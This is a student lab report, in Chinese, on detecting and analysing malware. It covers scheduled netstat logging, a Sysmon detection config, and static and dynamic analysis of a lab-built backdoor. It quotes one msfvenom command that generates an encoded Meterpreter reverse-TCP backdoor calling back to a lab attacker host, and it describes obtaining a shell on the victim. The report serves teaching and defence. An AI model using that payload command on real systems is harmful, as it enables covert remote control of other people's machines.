《网络对抗技术》exp4 恶意代码分析
实践目标
-
监控你自己系统的运行状态,看有没有可疑的程序在运行。
-
分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。
-
假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可疑对象进行进一步分析,好确认其具体的行为与性质。
实践内容
1.系统运行监控
(1)使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里。运行一段时间并分析该文件,综述一下分析结果。目标就是找出所有连网的程序,连了哪里,大约干了什么(不抓包的情况下只能猜),你觉得它这么干合适不。如果想进一步分析的,可以有针对性的抓包。
(2)安装配置sysinternals里的sysmon工具,设置合理的配置文件,监控自己主机的重点事可疑行为。
参考:schtask与sysmon应用指导
实际日志的分析还需要发挥下自己的创造力,结合以前学过的知识如linux的文本处理指令等进行。分析的难点在于从大量数据中理出规律、找出问题。这都依赖对结果过滤、统计、分类等进一步处理,这就得大家会什么用什么了。
2.恶意软件分析
分析该软件在(1)启动回连,(2)安装到目标机(3)及其他任意操作时(如进程迁移或抓屏,重要是你感兴趣)。该后门软件
(3)读取、添加、删除了哪些注册表项
(4)读取、添加、删除了哪些文件
(5)连接了哪些外部IP,传输了什么数据(抓包分析)
基础知识
恶意代码定义
- 使计算机按照攻击者的意图运行以达到恶意目的的指令集合。
- 指令集合: 二进制执行文件, 脚本语言代码, 宏代码, 寄生在文件、启动扇区的指令流
- 恶意代码目的: 技术炫耀/恶作剧, 远程控制, 窃取私密信息,盗用资源, 拒绝服务/破坏, …
恶意代码类型
- 计算机病毒, 蠕虫, 恶意移动代码, 后门, 特洛伊木马, 僵尸程序, Rootkit等…
- 计算机病毒是最早出现的恶意代码,媒体/工业界的概念混淆,经常以计算机病毒(Computer Virus)等价于恶意代码
实验步骤:
系统运行监控
1.使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里。运行一段时间并分析该文件,综述一下分析结果。目标就是找出所有连网的程序,连了哪里,大约干了什么(不抓包的情况下只能猜),你觉得它这么干合适不。如果想进一步分析的,可以有针对性的抓包。
-
使用命令
schtasks /create /TN netstat1211 /sc MINUTE /MO 1 /TR "cmd /c netstat -bn > c: etstat1211.txt"创建计划任务netstat1211TN是TaskName的缩写,创建的计划任务名为netstat1211;sc表示计时方式,我们以分钟计时填MINUTE;TR=Task Run,要运行的指令是netstat -bn;b表示显示可执行文件名;n表示以数字来显示IP和端口;>表示输出重定向,将输出存放在c: etstat1211.txt文件中
-
在C盘中创建一个netstat1211.bat脚本文件(可先在别的允许创建文件的盘创建txt文本文件,使用记事本写入后通过修改文件名来修改文件格式)
time /t >c:
etstat1211.txt
netstat -bn >c:
etstat1211.txt
- 如果无法通过文件名修改文件后缀,即点击`查看`,然后勾选`文件扩展名`
-
可以通过搜索,打开任务计划程序,可以查看新创建的这个任务
-
双击这个任务,点击
操作-编辑,将其中的程序或脚本改为我们创建的netstat1211.bat,把原来有的添加参数去掉,不然有很可能和我一样出现了netstat1211.txt文件持续不更新。
-
注意事项
-
在
常规选项卡中,一定要勾选使用最高权限运行,否则可能导致文件不能自主更新或者记录里出现权限问题)
-
在
条件选项卡中,电源选项中默认操作为只有在计算机使用交流电源时才启动此任务,使用电池电源时就会停止任务。如果没有修改默认操作,任务无论如何都无法执行可能只是因为拔掉了电源。,为了我们统计足够多的数据,最好把这个取消掉
-
-
任务计划程序中将我们的任务运行
-
-
在netstat1211.bat所在目录下出现一个netstat1211.txt文本文件,运行一段时间后,打开就可看到每隔一分钟被输到这里的联网数据。
-
当记录的数据足够丰富时,在任务计划程序中停止我们的任务,将所得数据在excel中进行分析,此过程要一直保持开机联网状态才能持续监控。
- 我的电脑原装office2016和操作系统存在冲突,因此使用WPS
- 创建一张新的xlsx表,点击
数据,在右边找到导入数据
数据源选择勾选直接打开数据文件,选择我们的netstat1211.txt
- 依次选择
其他编码,其他分隔符号,分隔符号除了其他全部勾选,生成如图所示的表
- 点击上方菜单栏中的
插入,选择数据透视图
- 选中我们需要分析的协议单元格,放在新工作表中
- 在新的工作表中,点击右侧的
字段列表,全选后去除图中的几个字段,然后确定,并将它拖放到下面的轴和值,就生成了我们想要的透视图。
- 选中我们需要分析的协议单元格,放在新工作表中
- 分析得到我当前一段时间里,由统计数据可知,联网最多的是是程序“searchUI.exe”,排名第二的QQ浏览器对应是“QQBrowser.exe”,它虚拟机的进程。这里我们还可以找到wps.exe、wpscloudsvr.exe、mysql.exe这些连网的进程。
2.使用sysmon工具监控系统(安装配置sysinternals里的sysmon工具,设置合理的配置文件,监控自己主机的重点事可疑行为。)
- sysmon是由Windows Sysinternals出品的一款Sysinternals系列中的工具,用来监视和记录系统活动,并记录到windows事件日志,可以提供有关进程创建,网络链接和文件创建时间更改的详细信息。
- 可选择的事件过滤器有
ProcessCreate 进程创建、FileCreateTime 进程创建时间、NetworkConnect 网络链接、ProcessTermina 进程结束、DriverLoad 驱动加载、ImageLoad 镜像加载、CreateRemoteTh 远程线程创建、RawAccessRead 驱动器读取、ProcessAccess 进程访问、FileCreate 文件创建、RegistryEvent 注册表事件、FileCreateStre 文件流创建等。 - 我选择的是进程创建、进程创建时间、网络链接、远程线程创建
- 过滤器事件的选项:
- 进程创建ProcessCreate的过滤事件选项有:
UtcTime, ProcessGuid, ProcessId, Image, CommandLine, CurrentDirectory, User, LogonGuid, LogonId, TerminalSessionId, IntegrityLevel, Hashes, ParentProcessGuid, ParentProcessId, ParentImage, ParentCommandLine - 进程创建时间FileCreatTime的过滤事件选项有:
UtcTime, ProcessGuid, ProcessId, Image, TargetFilename, CreationUtcTime, PreviousCreationUtcTime - 网络连接NetworkConnect的过滤事件选项有:
UtcTime, ProcessGuid, ProcessId, Image, User, Protocol, Initiated, SourceIsIpv6, SourceIp, SourceHostname, SourcePort, SourcePortName, DestinationIsIpv6, DestinationIp, DestinationHostname, DestinationPort, DestinationPortName - 远程线程创建CreateRemoteThread的过滤事件选项有:
UtcTime, SourceProcessGuid, SourceProcessId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, NewThreadId, StartAddress, StartModule, StartFunction
- 进程创建ProcessCreate的过滤事件选项有:
- 下载并使用老师给的sysmon,在sysmon所在目录下创建配置文件sysmon20181211.xml(仿照上面,可以先创建txt文件,之后再转换格式)
<!-- Capture all hashes -->
<HashAlgorithms>*</HashAlgorithms>
<EventFiltering>
<!-- Log all drivers except if the signature -->
<!-- contains Microsoft or Windows -->
<ProcessCreate onmatch="exclude">
<Image condition="end with">SearchUI.exe</Image>
<Image condition="end with">QQBrowser.exe</Image>
</ProcessCreate>
<ProcessCreate onmatch="include">
<ParentImage condition="end with">cmd.exe</ParentImage>
</ProcessCreate>
<FileCreateTime onmatch="exclude" >
<Image condition="end with">SearchUI.exe</Image>
<Image condition="end with">QQBrowser.exe</Image>
</FileCreateTime>
<NetworkConnect onmatch="exclude">
<Image condition="end with">SearchUI.exe</Image>
<Image condition="end with">QQBrowser</Image>
<SourcePort condition="is">137</SourcePort>
<SourceIp condition="is">127.0.0.1</SourceIp>
</NetworkConnect>
<NetworkConnect onmatch="include">
<DestinationPort condition="is">80</DestinationPort>
<DestinationPort condition="is">443</DestinationPort>
</NetworkConnect>
<CreateRemoteThread onmatch="include">
<TargetImage condition="end with">explorer.exe</TargetImage>
<TargetImage condition="end with">svchost.exe</TargetImage>
<TargetImage condition="end with">QQBrowser.exe</TargetImage>
<TargetImage condition="end with">winlogon.exe</TargetImage>
<SourceImage condition="end with">powershell.exe</SourceImage>
</CreateRemoteThread>
</EventFiltering>
</Sysmon>
-
onmatch选项只能设置为include或者exclude,exclude相当于白名单,不用记录;include相当于黑名单。 -
在代码中,第一行的
sysmon版本号要跟使用的sysmon一致,如果和我一样使用的是老师的sysmon,那就是3.10,否则会报错(如图所示)。 -
Image condition需要根据自己使用的浏览器进行更改,qq浏览器是“QQBrowser.exe” -
网络连接过滤掉了浏览器的网络连接,回环地址,和目的端口为
137的连接服务,并记录目的端口为80(http)和443(https)的网络连接137端口的主要作用是在局域网中提供计算机的名字或IP地址查询服务,一般安装了NetBIOS协议后,该端口会自动处于开放状态。127.0.0.1表示回环地址。
-
远程建成创建记录了目标为
explorer.exe、svchost.exe、QQBrowser.exe、winlogon.exe和powershell.exe的远程线程。explorer.exe是Windows程序管理器或者文件资源管理器svchost.exe是一个属于微软Windows操作系统的系统程序,是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。winlogon.exe是Windows NT 用户登陆程序,用于管理用户登录和退出。powershell.exe是专为系统管理员设计的新 Windows 命令行外壳程序。该外壳程序包括交互式提示和脚本环境,两者既可以独立使用也可以组合使用。
-
打开cmd管理员权限(一定要管理员,否则会出现错误如图所示),进入到sysmon所在的文件夹中,输入
sysmon.exe -i sysmon20181211.xml,此时会弹出一个弹框,选择agree。
错误:
正确:
-
可以通过搜素进入,查看事件查看器,选择日志的位置,应用程序和服务日志
/Microsoft/Windows/Sysmon/Operational,在这里,选择其中任一条,我们可以看到按照配置文件的要求记录的新事件,以及事件ID、任务类别、详细信息等。
-
拖拽滚条,在下方找到我们的sysmon20181211.xml。
-
分析日志,我分析的是自己生成的后门文件进行分析。
-
按照实验三的步骤,启动回连到kali,可以查看到这条日志,如图所示:
-
在kali中输入shell和ipconfig。
-
在21:40:41和21:42:49时我分别通过Linux获取了shell和ipconfig,在事件查看器中看到了两条日志,调用了cmd.exe和ipconfig.exe
- 在日志中仔细查看下面的信息能够发现,在后门程序目录下,显然与测试的后门程序相关:
- 在日志中仔细查看下面的信息能够发现,在后门程序目录下,显然与测试的后门程序相关:
-
恶意软件分析
1. 静态分析
- 文件扫描(VirusTotal、VirusScan工具等)
- 文件格式识别(peid、file、FileAnalyzer工具等)
- 字符串提取(Strings工具等)
- 反汇编(GDB、IDAPro、VC工具等)
- 反编译(REC、DCC、JAD工具等)
- 逻辑结构分析(Ollydbg、IDAPro工具等)
- 加壳脱壳(UPX、VMUnPacker工具等)
-
恶意代码扫描(VirusTotal网站)
-
参考实验三的代码,
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.11.151 LPORT=1211 -f exe > backdoor.exe生成后门,在VirusTotal进行扫描,结果如下
- 检出率为31/40,还是很高的
- 点击
detail可以查看细节,可以看到这个文件的三个算法的摘要值MD5、SHA1、SHA3、文件类型、文件大小,以及TRiD文件类型识别结果(注:TRiD通过读取文件头,根据特征码进行文件类型匹配)、算法库支持等信息。
- 这可以和后面的静态检测程序校验。
- 检出率为31/40,还是很高的
-
检测实验三种upx文件,能够在detail中查看到upx的类型!!!
-
-
文件格式识别(PEiD工具)
-
PEiD(PE Identifier)是一款著名的查壳工具,其功能强大,几乎可以侦测出所有的壳,其数量已超过470 种PE文档的加壳类型和签名。
-
下载了PEiD之后进入文件夹就可以看到exe文件,直接双击运行即可
-
首先扫描未经过其他操作的后门1211.exe,结果是
什么都没找到[overlay]
-
在扫描加密壳的后门1211hyperion.exe,结果也是
什么都没找到 *
-
接着扫描压缩壳的后门1211upx.exe,结果是
UPX 0.89.6……,发现了我们的压缩壳并写出来版本号
- 反编译、反汇编(PE Explorer工具)
-
PE Explorer是功能超强的可视化Delphi、C++、VB程序解析器,能快速对32位可执行程序进行反编译,并修改其中资源。
-
打开PE Exploer后打开后门程序backdoor.exe,显示出文件头信息。
-
选择菜单栏中的
view->import,可以查看调用的DLL文件。
- 可以看到更加详细的调用DLL文件的信息。
- msvcrt.dll:微软在windows操作系统中提供的C语言运行库执行文件
- kernel32.dll:属于内核级文件,它控制着系统的内存管理、数据的输入输出操作和中断处理,是必需的
- advapi32.dll:一个高级API应用程序接口服务库的一部分,包含的函数与对象的安全性,注册表的操控以及事件日志有关,会受到病毒的侵扰及篡改,导致系统文件丢失、损坏
- wsock32.dll:Windows Sockets应用程序接口,用于支持很多Internet和网络应用程序,是一个对系统很关键或很可疑的文件。
- ws2_32.dll:Windows Sockets应用程序接口。一些病毒会在杀毒软件目录中建立伪"ws2_32.dll"的文件或文件夹,在杀毒软件看来这是程序运行需要的文件而调用,这个所谓的“文件”又不具备系统"ws2_32.dll"文件的功能,所以杀毒软件等就无法运行了而提示:应用程序正常初始化失败。
-
菜单栏选中
view->resources,可以查看到与VirusTotal和PEiD中一样的版本信息
-
这款软件的主要功能是实现反汇编,可以在菜单栏
tools->disassembler,可以看到将该文件反汇编的结果
2.动态分析
- 快照比对(SysTracer、Filesnap、Regsnap工具等)
- 抓包分析(WireShark工具等)
- 行为监控(Filemon、Regmon、ProcessExplorer工具等)
- 沙盒(NormanSandbox、CWSandbox工具等)
- 动态跟踪调试(Ollydbg、IDAPro工具等)
- 快照对比(SysTracer工具)
SysTracer是一个系统工具,可以帮助您找到应用于计算机中不同项目和区域的更改-可能是恶意软件导致的更改。
为了发现这些更改,SysTracer执行系统扫描,记录有关文件和文件夹,注册表项,系统服务,驱动程序,当前活动的进程,已加载的库(DLL)和计划在系统启动时运行的应用程序的信息。
点击snapshot,点击start,这个拍摄完成后会自动停止,stop表示终止而非结束,时间会根据我们电脑的实际情况而定,一般会有几分钟的过程,我创建了五个进行对比,分别是:
Snapshot #1:不进行任何操作;
Snapshot #2:运行后门程序并成功反弹连接;
Snapshot #3:获取shell并获取被攻击机文件详情;
Snapshot #4:使用msf命令ipconfig;
Snapshot #5:使用msf命令getuid。
-
对比快照1和快照2,在
snapshots那一页修改我们需要对比的快照,点击compare,在view mode中选择Only differences方便查看
- 点击
application,在opened ports中我们能看到后门1211upx.exe连接的本地地址和目标地址以及端口号;
- 在
opened handles中,可以看见增加了一些文件,也删除了一些文件;
- 在
loaded dll中,启动后门程序后增加和删除的dll文件;
- 在
running processes中,点击1211upx.exe显示为SysTracer no registered
- 点击
-
对比快照2和快照3
- 能找到一个cmd.exe的打开对象是ncat.exe;
- 在
opened ports中我们能看到两次操作间的虚拟机vmnet8间的交互;
- 在
loaded dll中,启动后门程序后增加和删除的dll文件;
- 在
running processes中,可以看见多出来两个cmd.exe和conhost.exe
- Linux调用shell之后,修改了注册表中本机键值的conhost.exe,并删增了用户键值下的读者修订信息:
- conhost全称是console host process,即命令行程序的宿主进程。大家都知道命令行程序是什么东西吧,比如ipconfig.exe之类,由于命令行程序自身没有代码来显示UI,我们平时看到的命令行窗口内容都是由宿主进程来完成的,包括窗口的显示,window message的处理等等。
- 这样一来就可以得到访问读取被攻击机的资源了。
- 能找到一个cmd.exe的打开对象是ncat.exe;
-
对比快照3和快照4
- 关闭了audiodg.exe,删除了之前建立的调用许多DLL的过程;
- 关闭了svchost.exe和smartcreen.exe
- svchost进程只作为服务宿主,并不能实现任何服务功能,即它只能提供条件让其他服务在这里被启动,而它自己却不能给用户提供任何服务。因为svchost进程启动各种服务,所以病毒、木马也想尽办法来利用它,企图利用它的特性来迷惑用户,达到感染、入侵、破坏的目的。
- 我猜测是和ipconfig有关的调用需要svchost.exe
- 关闭了audiodg.exe,删除了之前建立的调用许多DLL的过程;
-
对比快照4和快照5
- 打开了searchFilterHost.exe
- 是Microsoft Windows Vista 桌面搜索过滤器程序
- SearchFilterHost.exe 也可能是恶意软件所伪装,尤其是当它们存在于 c:windows 或 c:windowssystem32 目录。我们建议使用 Security Task Manager 来检查电脑的安全状况,以便进一步查看 SearchFilterHost.exe 进程是否真的有害。
- 增加了很多dll文件
- 打开了searchFilterHost.exe
- Process Monitor
- Process Monitor 是一款由 Sysinternals 公司开发的包含强大的监视和过滤功能的高级 Windows 监视工具,可实时显示文件系统、注册表、进程/线程的活动。总体来说,Process Monitor相当于Filemon+Regmon,其中的Filemon专门用来监视系统中的任何文件操作过程,而Regmon用来监视注册表的读写操作过程。
- 打开软件,可以看到此时计算机各个进程的详细记录,包括时间、进程名、进程ID、操作、路径等。
- 点击那个望远镜的标记进行搜索,可能需要多搜索几次,找到对应的后门文件
- 查看后门进程的事件内容
- 查看后门进程的事件属性
- 查看后门进程引用的各种库
- 网络监控(Wireshark工具)
注意:接口应该选择VMnet8这个,否则抓不到Kali和主机之间的包
win10执行后门程序1211upxe.exe进行回连,输入过滤条件ip.addr == 192.168.11.151(虚拟机的ip地址),可以看到Wireshark上捕获到大量的TCP传输,输入其他命令,Kali会不断给Windows传一大堆ACK包,有时还伴有PSH+ACK包。(PSH就表示有 DATA数据传输)
开始抓包后,Kali中启动监听,然后Windows端回连,可以看到TCP三次握手建立连接的过程,目的端口是Kali中设置的监听端口1211,还可以看到目的和源IP地址:
实验后回答问题
(1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。
- 使用Windows计划任务schtasks:定期查看网络连接情况,包括IP和端口,并进行统计分析,确认IP所属和连接发起方详情。
- 使用sysmon工具:配置好想要查看的选项,比如网络连接、注册表信息等,通过所生成的日志进行查看分析。
- 使用Process Explorer工具,监视进程执行情况。
- 使用PEiD、PE Exploer工具:查看一个程序是否加壳,并进行反汇编、反编译,查看并分析该程序是否有违规操作。
- 使用sysTracer工具:进行快照对比,发现恶意代码对注册表、exe可执行文件的操作。
- 使用Wireshark工具:捕获数据包,分析数据流情况。
(2)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。
- 使用systracer工具分析恶意软件,查看其对注册表和文件的修改。
- 使用Wireshark进行抓包分析,监视其与主机进行的通信过程。
- 使用PEiD查看程序是否加壳,加的什么壳
- 使用Process Explorer工具或Process Monitor工具,监视文件系统、注册表、进程/线程的活动。
实践总结与体会
这次的实验和先前两个实验有所转变,更多依靠工具去分析发现恶意代码,对于那些后门程序有了更加深刻的了解,知道那些压缩壳的版本号,涉及的dll文件等等方面。在遇到问题中也学会摸索,例如使用sysmon时报错及时调整为管理员,使用wireshark习惯性地进入WLAN发现无法筛选到符合条件的记录,退出后仔细观察不同目录,联系上次实验修改桥接模式的细节,进入VMnet8中筛选。
实验中遇到的最大的困难是使用systracer软件,我的系统可能过大,导致拍摄快照时,第一张快照就达到10多分钟仍未停止,我就仔细查看网上诸多教程,根据学长学姐们的建议,我尝试使用之前课程中使用的xp虚拟机发现软件版本不一致,xp为32位的计算机,而systracer为64位,因此重新下载安装windows7,但是由于我下载时没有仔细看,下成了x86的版本,又是一个需要32位的软件操作系统,我就重新下载x64位的镜像,还没下载完,就熄灯了。此时心血来潮在主机中重试,竟然2分多钟就抓完了第一张!!!太令人惊喜了。